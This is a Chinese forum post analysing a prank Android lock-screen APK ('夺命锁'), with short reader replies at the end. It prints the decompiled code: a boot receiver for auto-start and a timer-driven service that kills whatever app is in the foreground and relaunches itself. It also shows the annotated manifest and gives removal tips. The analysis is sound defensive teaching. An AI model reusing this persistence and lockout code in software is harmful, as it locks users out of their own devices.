夺命锁apk恶意程序简单分析
本帖最后由 轩少 于 2014-9-11 20:47 编辑文件相关信息:
C:\Documents and Settings\Administrator\桌面\夺命锁\1.apk
大小: 33528 字节
修改时间: 2014年7月8日, 15:05:48
MD5: EB447AF6B1824530FE63359A33467B13
SHA1: A5D9C553A7706A6A88C16F2221268C1B4A98A906
CRC32: F19DD189
因为这是本论坛一位用户发的样本,我以前也见过,差点被阴了。。
帖子地址:http://www.52pojie.cn/thread-271399-1-1.html
样本下载地址:http://www.52pojie.cn/forum.php? ... DM1fDI3MTM5OQ%3D%3D
使用工具:AXMLPrinter2
dex2jar
jd_Gui
XMLView(不带要用记事本的用这个看翻译过XML文档,记得把txt改为.xml后缀)
1.使用解压软件右键解压得到以下文件:
2.下载dex2jar工具解压:
把classes.dex 拷贝到dex2jar目录下:在路径上输入cmd后再输入:dex2jar.bat classes.dex 回车后
得到文件:classes_dex2jar.jar
3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件:
4.查看具体代码:
BootBroadcastReceiver代码如下:
package tk.jianmo.study;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
public class BootBroadcastReceiver extends BroadcastReceiver
{
String action_boot = "android.intent.action.BOOT_COMPLETED";
@Override
public void onReceive(Context paramContext, Intent paramIntent)
{
try
{
Class localClass = Class.forName("tk.jianmo.study.MainActivity");
Intent localIntent = new Intent(paramContext, localClass);
localIntent.addFlags(268435456);
paramContext.startActivity(localIntent);
return;
}
catch (ClassNotFoundException localClassNotFoundException)
{
NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
throw localNoClassDefFoundError;
}
}
}
BuildConfig代码如下:
public final class BuildConfig
{
public static final boolean DEBUG = true;
}
R文件代码如下:
package tk.jianmo.study;
public final class R
{
public static final class attr
{
}
public static final class drawable
{
public static final int d1 = 2130837504;
public static final int d2 = 2130837505;
public static final int ic_launcher = 2130837506;
public static final int mybutton = 2130837507;
public static final int sp = 2130837508;
}
public static final class id
{
public static final int bn_bf = 2131034112;
public static final int bn_hy = 2131034113;
public static final int mainTextViewTime = 2131034114;
}
public static final class layout
{
public static final int main = 2130903040;
}
public static final class string
{
public static final int app_name = 2130968577;
public static final int hello = 2130968576;
}
}
killpoccessserve代码如下:
package tk.jianmo.study;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningTaskInfo;
import android.app.Service;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;
import android.os.Handler.Callback;
import android.os.IBinder;
import android.os.Message;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;
public class killpoccessserve extends Service
{
Context context;
@Override
public IBinder onBind(Intent paramIntent)
{
return null;
}
@Override
public void onCreate()
{
this.context = this;
Handler.Callback local100000000 = new Handler.Callback()
{
public boolean handleMessage(Message paramAnonymousMessage)
{
ActivityManager localActivityManager = (ActivityManager)killpoccessserve.this.context.getSystemService("activity");
String str = ((ActivityManager.RunningTaskInfo)localActivityManager.getRunningTasks(1).get(0)).topActivity.getPackageName();
if (str.equals("tk.jianmo.study"));
while (true)
{
return false;
Intent localIntent = new Intent();
Context localContext = killpoccessserve.this.context;
try
{
Class localClass = Class.forName("tk.jianmo.study.MainActivity");
localIntent.setClass(localContext, localClass);
localIntent.setFlags(67108864);
localIntent.addFlags(268435456);
killpoccessserve.this.startActivity(localIntent);
localActivityManager.killBackgroundProcesses(str);
}
catch (ClassNotFoundException localClassNotFoundException)
{
NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
throw localNoClassDefFoundError;
}
}
}
};
Handler localHandler = new Handler(local100000000);
Timer localTimer = new Timer();
TimerTask local100000001 = new TimerTask()//定时任务
{
private final Handler val$h;
@Override
public void run()
{
this.val$h.obtainMessage().sendToTarget();
}
};
localTimer.schedule(local100000001, 0, '–');
}
@Override
public void onDestroy()
{
super.onDestroy();
}
@Override
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
}
}
经过AXMLPrinter2翻译后的main.xml代码就一行,
<?xml version="1.0" encoding="utf-8"?>
经过AXMLPrinter2翻译后的AndroidManifest.xml的代码如下:
<?xml version="1.0" encoding="utf-8"?>
<manifest
xmlns:android="http://schemas.android.com/apk/res/android"
android:versionCode="1"
android:versionName="3.0"
package="tk.jianmo.study"
>
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="11"
>
</uses-sdk>
<application
android:label="@7F040001"
android:icon="@7F020002"
android:debuggable="true"
>
<service
android:name=".killpoccessserve"//这个服务会循环检测当前的顶层程序是不是自己,如果不是自己,就杀掉它,并启动自己
>
</service>
/>
<activity
android:theme="@android:01030007"
android:label="@7F040001"
android:name=".MainActivity"
>
<intent-filter
>
<action
android:name="android.intent.action.MAIN"
>
</action>
<category
android:name="android.intent.category.LAUNCHER"
>
</category>
</intent-filter>
</activity>
<receiver
android:name=".BootBroadcastReceiver"//实现开机自启
>
<intent-filter
>
<action
android:name="android.intent.action.BOOT_COMPLETED"//开机广播(开机自启)
>
</action>
<action
android:name="android.intent.action.BOOT_COMPLETED"//开机广播(开机自启)
>
</action>
<action
android:name="android.intent.ACTION_SCREEN_OFF"//关机广播(应该是倒计时关机的)
>
</action>
<action
android:name="android.net.conn.CONNECTIVITY_CHANGE"//监听网络变化
>
</action>
<action
android:name="android.net.wifi.WIFI_STATE_CHANGED"//监听WIFI变化
>
</action>
<action
android:name="android.net.wifi.STATE_CHANGE"//检测WIFI状态
>
</action>
<category
android:name="android.intent.category.HOME"//更换安卓桌面
>
</category>
</intent-filter>
</receiver>
</application>
<uses-permission
android:name="android.permission.ACCESS_WIFI_STATE"//允许程序访问Wi-Fi网络状态信息
>
</uses-permission>
<uses-permission
android:name="android.permission.CHANGE_WIFI_STATE"//改变WIFI状态
>
</uses-permission>
<uses-permission
android:name="android.permission.RECEIVE_BOOT_COMPLETED"//允许程序接收到 ACTION_BOOT_COMPLETED广播在系统完成启动(开机自启)
>
</uses-permission>
<uses-permission
android:name="android.permission.KILL_BACKGROUND_PROCESSES"//关闭后台程序
>
</uses-permission>
<uses-permission
android:name="android.permission.GET_TASKS"//检索正在运行的应用
>
</uses-permission>
<uses-permission
android:name="android.permission.WAKE_LOCK"//阻止手机进入休眠状态
>
</uses-permission>
</manifest>
小结:通过AndroidManifest.xml等,我们不难看出,这款APP索取了:开机自启、检测当前运行程序、关闭后台、前台程序、禁止系统进入休眠状态等权限,但它的性质终究是款恶作剧软件,它的锁屏界面保存在\res\文件夹下,它在打开的同时设定了一个定时任务(关机),并且实现开机自启,后台自启,想干掉它还是很容易的。
清理它的方法很多,在这里举几个例子:
1.进入recovery模式双WPIE操作(谨慎!手机中无重要文件可用!)
2.用手机助手PC端的程序清理
3.小米系统先按主屏键3秒然后杀掉进程再卸载(未测试……)
【另:感谢JJ师傅……】
{:17_1062:}虽然看不懂,但是感脚很高深 哎呀,我是第一个。;留个脚步,虽然我都看不懂,但是看着这么多的英文,赞你一个!!!! 好可怕的样子 能否简单易懂点{:1_908:} 额 为啥没有代码注释?{:301_977:} 谢谢分享,学习了 轩少出马,必属精品。 膜拜大神····